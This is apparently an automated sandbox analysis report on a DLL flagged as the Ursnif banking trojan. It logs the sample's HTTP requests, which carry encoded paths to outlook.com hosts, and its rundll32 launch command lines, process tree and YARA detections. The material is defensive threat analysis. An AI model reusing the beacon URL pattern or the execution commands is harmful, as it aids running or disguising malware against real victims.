                                                                                                                                2021-10-11 22:51:00 UTC2INData Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 4d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e 4f 62 6a 65 63 74 20 4d 6f 76 65 64 3c 2f 68 31 3e 54 68 69 73 20 64 6f 63 75 6d 65 6e 74 20 6d 61 79 20 62 65 20 66 6f 75 6e 64 20 3c 61 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 73 6e 2e 63 6f 6d 2f 6d 61 69 6c 2f 6c 69 6f 70 6f 6c 6f 2f 69 50 65 30 52 4a 72 33 59 52 6f 49 71 67 4a 5a 2f 62 70 32 39 47 31 47 7a 51 51 6c 47 4a 4d 5f 2f 32 46 75 4c 75 56 70 72 7a 61 50 77 30 53 45 34 48 4e 2f 7a 6e 37 4f 56 75 47 4b 73 2f 74 71 37 43 74 67 49 6c 6d 77 64 56 45 54 53 64 5a 5f 32 42 2f 62 38 55 55 61 52 34 79 41 35 6d 39 79 45 37 76 6b 61 31 2f 47 68 30 4a 74 76 75 41 54 72 56 6f 62
                                                                                                                                Data Ascii: <head><title>Document Moved</title></head><body><h1>Object Moved</h1>This document may be found <a HREF="https://www.msn.com/mail/liopolo/iPe0RJr3YRoIqgJZ/bp29G1GzQQlGJM_/2FuLuVprzaPw0SE4HN/zn7OVuGKs/tq7CtgIlmwdVETSdZ_2B/b8UUaR4yA5m9yE7vka1/Gh0JtvuATrVob


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                2192.168.2.34977940.97.161.50443C:\Windows\System32\loaddll32.exe
                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                2021-10-11 22:51:28 UTC2OUTGET /signup/liopolo/_2FIM7vtUZ4D/xYsj75o0T3l/xgIGXyko1bBc35/qMEGgdco4EjP8aQKQAv1_/2Fr_2B9CI4wQ8pfr/Ae2iDA4fgxuX_2F/EFvlU1RKcf_2BhblV1/R4qA8rb50/6GzaaVaZ467uvOz0B0BG/K6jq9ZPGaLm0dRA_2Bj/N_2Bpix6pkAKp3MF04Fjk4/gUVThkiIQADOb/DN4NS4MK/cUs7VKKK39GCKuME9SOTcIm/_2FCC2gu/C.jre HTTP/1.1
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Pragma: no-cache
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                                Host: outlook.com
                                                                                                                                2021-10-11 22:51:28 UTC2INHTTP/1.1 301 Moved Permanently
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Pragma: no-cache
                                                                                                                                Location: https://www.outlook.com/signup/liopolo/_2FIM7vtUZ4D/xYsj75o0T3l/xgIGXyko1bBc35/qMEGgdco4EjP8aQKQAv1_/2Fr_2B9CI4wQ8pfr/Ae2iDA4fgxuX_2F/EFvlU1RKcf_2BhblV1/R4qA8rb50/6GzaaVaZ467uvOz0B0BG/K6jq9ZPGaLm0dRA_2Bj/N_2Bpix6pkAKp3MF04Fjk4/gUVThkiIQADOb/DN4NS4MK/cUs7VKKK39GCKuME9SOTcIm/_2FCC2gu/C.jre
                                                                                                                                Server: Microsoft-IIS/10.0
                                                                                                                                request-id: 317cc244-0722-c41d-2bc6-bdaf257bb4d7
                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                X-FEServer: MWHPR11CA0034
                                                                                                                                X-RequestId: 46bbf0e0-7ef8-408f-a392-a9dc993be4c6
                                                                                                                                MS-CV: RMJ8MSIHHcQrxr2vJXu01w.0
                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                X-FEServer: MWHPR11CA0034
                                                                                                                                Date: Mon, 11 Oct 2021 22:51:28 GMT
                                                                                                                                Connection: close
                                                                                                                                Content-Length: 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                3192.168.2.34978252.98.207.210443C:\Windows\System32\loaddll32.exe
                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                2021-10-11 22:51:28 UTC3OUTGET /signup/liopolo/_2FIM7vtUZ4D/xYsj75o0T3l/xgIGXyko1bBc35/qMEGgdco4EjP8aQKQAv1_/2Fr_2B9CI4wQ8pfr/Ae2iDA4fgxuX_2F/EFvlU1RKcf_2BhblV1/R4qA8rb50/6GzaaVaZ467uvOz0B0BG/K6jq9ZPGaLm0dRA_2Bj/N_2Bpix6pkAKp3MF04Fjk4/gUVThkiIQADOb/DN4NS4MK/cUs7VKKK39GCKuME9SOTcIm/_2FCC2gu/C.jre HTTP/1.1
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Pragma: no-cache
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                                Host: www.outlook.com
                                                                                                                                2021-10-11 22:51:28 UTC4INHTTP/1.1 301 Moved Permanently
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Pragma: no-cache
                                                                                                                                Location: https://outlook.office365.com/signup/liopolo/_2FIM7vtUZ4D/xYsj75o0T3l/xgIGXyko1bBc35/qMEGgdco4EjP8aQKQAv1_/2Fr_2B9CI4wQ8pfr/Ae2iDA4fgxuX_2F/EFvlU1RKcf_2BhblV1/R4qA8rb50/6GzaaVaZ467uvOz0B0BG/K6jq9ZPGaLm0dRA_2Bj/N_2Bpix6pkAKp3MF04Fjk4/gUVThkiIQADOb/DN4NS4MK/cUs7VKKK39GCKuME9SOTcIm/_2FCC2gu/C.jre
                                                                                                                                Server: Microsoft-IIS/10.0
                                                                                                                                request-id: bbc58b63-0200-d637-1f82-5fe41ae08c7e
                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                X-FEServer: AS9PR0301CA0054
                                                                                                                                X-RequestId: 884c23bc-6988-4e6b-ba85-13b6a6e7802c
                                                                                                                                MS-CV: Y4vFuwACN9Yfgl/kGuCMfg.0
                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                X-FEServer: AS9PR0301CA0054
                                                                                                                                Date: Mon, 11 Oct 2021 22:51:28 GMT
                                                                                                                                Connection: close
                                                                                                                                Content-Length: 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                4192.168.2.34978340.101.60.226443C:\Windows\System32\loaddll32.exe
                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                2021-10-11 22:51:28 UTC4OUTGET /signup/liopolo/_2FIM7vtUZ4D/xYsj75o0T3l/xgIGXyko1bBc35/qMEGgdco4EjP8aQKQAv1_/2Fr_2B9CI4wQ8pfr/Ae2iDA4fgxuX_2F/EFvlU1RKcf_2BhblV1/R4qA8rb50/6GzaaVaZ467uvOz0B0BG/K6jq9ZPGaLm0dRA_2Bj/N_2Bpix6pkAKp3MF04Fjk4/gUVThkiIQADOb/DN4NS4MK/cUs7VKKK39GCKuME9SOTcIm/_2FCC2gu/C.jre HTTP/1.1
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Pragma: no-cache
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                                Host: outlook.office365.com
                                                                                                                                2021-10-11 22:51:28 UTC5INHTTP/1.1 404 Not Found
                                                                                                                                Content-Length: 1245
                                                                                                                                Content-Type: text/html
                                                                                                                                Server: Microsoft-IIS/10.0
                                                                                                                                request-id: f95b0919-28f4-47a7-648d-aec4a884b896
                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                X-CalculatedFETarget: DB6PR07CU001.internal.outlook.com
                                                                                                                                X-BackEndHttpStatus: 404
                                                                                                                                X-FEProxyInfo: DB6PR07CA0023.EURPRD07.PROD.OUTLOOK.COM
                                                                                                                                X-CalculatedBETarget: DB7P194MB0474.EURP194.PROD.OUTLOOK.COM
                                                                                                                                X-BackEndHttpStatus: 404
                                                                                                                                X-RUM-Validated: 1
                                                                                                                                X-Proxy-RoutingCorrectness: 1
                                                                                                                                X-Proxy-BackendServerStatus: 404
                                                                                                                                MS-CV: GQlb+fQop0dkja7EqIS4lg.1.1
                                                                                                                                X-FEServer: DB6PR07CA0023
                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                X-FEServer: AM5P194CA0003
                                                                                                                                Date: Mon, 11 Oct 2021 22:51:28 GMT
                                                                                                                                Connection: close
                                                                                                                                2021-10-11 22:51:28 UTC6INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c
                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - Fil


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                5192.168.2.34981640.97.161.50443C:\Windows\System32\loaddll32.exe
                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                2021-10-11 22:51:43 UTC7OUTGET /signup/liopolo/4n8rYhECWMDt1xafNsN/Eaa1J0ldXQTsDJvMLeSORg/0uI4SoaziSZwM/OT0v9gJP/37ksb0fn_2FMie_2BYo4csJ/dqKZMmwVVY/NW0eW6kdSEZXJYqwn/QNXYETIahUBU/o58GZV2YU8a/BbpCAOptavmy35/f7j8F4VRrMxGtvE_2FpUR/raE_2Bxf0kZoKM1o/ZbBDSIO0tnuHu4l/cpfED0PavpBMJm1ykA/Lck.jre HTTP/1.1
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Pragma: no-cache
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                                Host: outlook.com
                                                                                                                                2021-10-11 22:51:43 UTC7INHTTP/1.1 301 Moved Permanently
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Pragma: no-cache
                                                                                                                                Location: https://www.outlook.com/signup/liopolo/4n8rYhECWMDt1xafNsN/Eaa1J0ldXQTsDJvMLeSORg/0uI4SoaziSZwM/OT0v9gJP/37ksb0fn_2FMie_2BYo4csJ/dqKZMmwVVY/NW0eW6kdSEZXJYqwn/QNXYETIahUBU/o58GZV2YU8a/BbpCAOptavmy35/f7j8F4VRrMxGtvE_2FpUR/raE_2Bxf0kZoKM1o/ZbBDSIO0tnuHu4l/cpfED0PavpBMJm1ykA/Lck.jre
                                                                                                                                Server: Microsoft-IIS/10.0
                                                                                                                                request-id: 2129bc54-af0a-cd98-b796-ce58b9a66f1a
                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                X-FEServer: MWHPR11CA0044
                                                                                                                                X-RequestId: 520fcc81-91de-431f-b63c-64a04ba5b2fa
                                                                                                                                MS-CV: VLwpIQqvmM23ls5YuaZvGg.0
                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                X-FEServer: MWHPR11CA0044
                                                                                                                                Date: Mon, 11 Oct 2021 22:51:43 GMT
                                                                                                                                Connection: close
                                                                                                                                Content-Length: 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                6192.168.2.34982052.98.207.210443C:\Windows\System32\loaddll32.exe
                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                2021-10-11 22:51:43 UTC8OUTGET /signup/liopolo/4n8rYhECWMDt1xafNsN/Eaa1J0ldXQTsDJvMLeSORg/0uI4SoaziSZwM/OT0v9gJP/37ksb0fn_2FMie_2BYo4csJ/dqKZMmwVVY/NW0eW6kdSEZXJYqwn/QNXYETIahUBU/o58GZV2YU8a/BbpCAOptavmy35/f7j8F4VRrMxGtvE_2FpUR/raE_2Bxf0kZoKM1o/ZbBDSIO0tnuHu4l/cpfED0PavpBMJm1ykA/Lck.jre HTTP/1.1
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Pragma: no-cache
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                                Host: www.outlook.com
                                                                                                                                2021-10-11 22:51:43 UTC8INHTTP/1.1 301 Moved Permanently
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Pragma: no-cache
                                                                                                                                Location: https://outlook.office365.com/signup/liopolo/4n8rYhECWMDt1xafNsN/Eaa1J0ldXQTsDJvMLeSORg/0uI4SoaziSZwM/OT0v9gJP/37ksb0fn_2FMie_2BYo4csJ/dqKZMmwVVY/NW0eW6kdSEZXJYqwn/QNXYETIahUBU/o58GZV2YU8a/BbpCAOptavmy35/f7j8F4VRrMxGtvE_2FpUR/raE_2Bxf0kZoKM1o/ZbBDSIO0tnuHu4l/cpfED0PavpBMJm1ykA/Lck.jre
                                                                                                                                Server: Microsoft-IIS/10.0
                                                                                                                                request-id: dba8ebf3-3dce-76c0-0ac8-5a534885a9c6
                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                X-FEServer: AS9PR0301CA0045
                                                                                                                                X-RequestId: 7aae346b-564a-41f4-8c31-dc0c482e6c9d
                                                                                                                                MS-CV: 8+uo2849wHYKyFpTSIWpxg.0
                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                X-FEServer: AS9PR0301CA0045
                                                                                                                                Date: Mon, 11 Oct 2021 22:51:42 GMT
                                                                                                                                Connection: close
                                                                                                                                Content-Length: 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                7192.168.2.34982140.101.60.226443C:\Windows\System32\loaddll32.exe
                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                2021-10-11 22:51:43 UTC9OUTGET /signup/liopolo/4n8rYhECWMDt1xafNsN/Eaa1J0ldXQTsDJvMLeSORg/0uI4SoaziSZwM/OT0v9gJP/37ksb0fn_2FMie_2BYo4csJ/dqKZMmwVVY/NW0eW6kdSEZXJYqwn/QNXYETIahUBU/o58GZV2YU8a/BbpCAOptavmy35/f7j8F4VRrMxGtvE_2FpUR/raE_2Bxf0kZoKM1o/ZbBDSIO0tnuHu4l/cpfED0PavpBMJm1ykA/Lck.jre HTTP/1.1
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Pragma: no-cache
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                                Host: outlook.office365.com
                                                                                                                                2021-10-11 22:51:43 UTC9INHTTP/1.1 404 Not Found
                                                                                                                                Content-Length: 1245
                                                                                                                                Content-Type: text/html
                                                                                                                                Server: Microsoft-IIS/10.0
                                                                                                                                request-id: 7ba0ffc6-f8f8-51ea-5952-b8c598033637
                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                X-CalculatedFETarget: PR3P195CU001.internal.outlook.com
                                                                                                                                X-BackEndHttpStatus: 404
                                                                                                                                X-FEProxyInfo: PR3P195CA0027.EURP195.PROD.OUTLOOK.COM
                                                                                                                                X-CalculatedBETarget: PR3P194MB0683.EURP194.PROD.OUTLOOK.COM
                                                                                                                                X-BackEndHttpStatus: 404
                                                                                                                                X-RUM-Validated: 1
                                                                                                                                X-Proxy-RoutingCorrectness: 1
                                                                                                                                X-Proxy-BackendServerStatus: 404
                                                                                                                                MS-CV: xv+ge/j46lFZUrjFmAM2Nw.1.1
                                                                                                                                X-FEServer: PR3P195CA0027
                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                X-FEServer: AM5P194CA0015
                                                                                                                                Date: Mon, 11 Oct 2021 22:51:42 GMT
                                                                                                                                Connection: close
                                                                                                                                2021-10-11 22:51:43 UTC10INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c
                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - Fil


                                                                                                                                Code Manipulations

                                                                                                                                Statistics

                                                                                                                                Behavior

                                                                                                                                Click to jump to process

                                                                                                                                System Behavior

                                                                                                                                Analysis Process: loaddll32.exe PID: 7088 Parent PID: 3696

                                                                                                                                General

                                                                                                                                Start time:00:49:03
                                                                                                                                Start date:12/10/2021
                                                                                                                                Path:C:\Windows\System32\loaddll32.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:loaddll32.exe 'C:\Users\user\Desktop\616412739e268.dll'
                                                                                                                                Imagebase:0x13b0000
                                                                                                                                File size:893440 bytes
                                                                                                                                MD5 hash:72FCD8FB0ADC38ED9050569AD673650E
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.636681449.000000000302F000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.504323310.00000000033A8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.504453147.00000000033A8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.504380266.00000000033A8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.504256505.00000000033A8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.504206651.00000000033A8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.504111647.00000000033A8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000003.468068395.0000000000B30000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.504159265.00000000033A8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000002.681378105.0000000002D49000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.547848145.000000000322B000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.504691166.00000000033A8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.504416763.00000000033A8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.593657647.000000000312D000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000002.681690642.0000000002FB0000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                Reputation:moderate

                                                                                                                                Analysis Process: cmd.exe PID: 5724 Parent PID: 7088

                                                                                                                                General

                                                                                                                                Start time:00:49:04
                                                                                                                                Start date:12/10/2021
                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\616412739e268.dll',#1
                                                                                                                                Imagebase:0xd80000
                                                                                                                                File size:232960 bytes
                                                                                                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high

                                                                                                                                Analysis Process: rundll32.exe PID: 6084 Parent PID: 7088

                                                                                                                                General

                                                                                                                                Start time:00:49:04
                                                                                                                                Start date:12/10/2021
                                                                                                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:rundll32.exe C:\Users\user\Desktop\616412739e268.dll,BeGrass
                                                                                                                                Imagebase:0x1160000
                                                                                                                                File size:61952 bytes
                                                                                                                                MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000005.00000003.431870114.00000000010D0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                Reputation:high

                                                                                                                                Analysis Process: rundll32.exe PID: 4432 Parent PID: 5724

                                                                                                                                General

                                                                                                                                Start time:00:49:04
                                                                                                                                Start date:12/10/2021
                                                                                                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:rundll32.exe 'C:\Users\user\Desktop\616412739e268.dll',#1
                                                                                                                                Imagebase:0x1160000
                                                                                                                                File size:61952 bytes
                                                                                                                                MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000006.00000003.533746725.0000000005BD8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000006.00000003.533976694.0000000005BD8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000006.00000003.533515882.0000000005BD8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000006.00000003.534880581.0000000005BD8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000006.00000003.533633690.0000000005BD8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000006.00000003.533322281.0000000005BD8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000006.00000002.682624549.0000000005379000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000006.00000003.533883648.0000000005BD8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000006.00000003.430400747.0000000003180000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000006.00000003.668796165.000000000585F000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000006.00000003.625115852.000000000595D000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000006.00000003.579417295.0000000005A5B000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000006.00000003.533401474.0000000005BD8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000006.00000003.533448207.0000000005BD8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                Reputation:high

                                                                                                                                Analysis Process: rundll32.exe PID: 6012 Parent PID: 7088

                                                                                                                                General

                                                                                                                                Start time:00:49:08
                                                                                                                                Start date:12/10/2021
                                                                                                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:rundll32.exe C:\Users\user\Desktop\616412739e268.dll,Fieldeight
                                                                                                                                Imagebase:0x1160000
                                                                                                                                File size:61952 bytes
                                                                                                                                MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000009.00000003.446004934.0000000001090000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                Reputation:high

                                                                                                                                Analysis Process: rundll32.exe PID: 4360 Parent PID: 7088

                                                                                                                                General

                                                                                                                                Start time:00:49:13
                                                                                                                                Start date:12/10/2021
                                                                                                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:rundll32.exe C:\Users\user\Desktop\616412739e268.dll,Often
                                                                                                                                Imagebase:0x1160000
                                                                                                                                File size:61952 bytes
                                                                                                                                MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000000A.00000003.469511127.00000000010B0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                Reputation:high

                                                                                                                                Analysis Process: WerFault.exe PID: 6140 Parent PID: 6084

                                                                                                                                General

                                                                                                                                Start time:00:50:43
                                                                                                                                Start date:12/10/2021
                                                                                                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6084 -s 880
                                                                                                                                Imagebase:0xe60000
                                                                                                                                File size:434592 bytes
                                                                                                                                MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high

                                                                                                                                Analysis Process: WerFault.exe PID: 4700 Parent PID: 6012

                                                                                                                                General

                                                                                                                                Start time:00:50:49
                                                                                                                                Start date:12/10/2021
                                                                                                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6012 -s 628
                                                                                                                                Imagebase:0xe60000
                                                                                                                                File size:434592 bytes
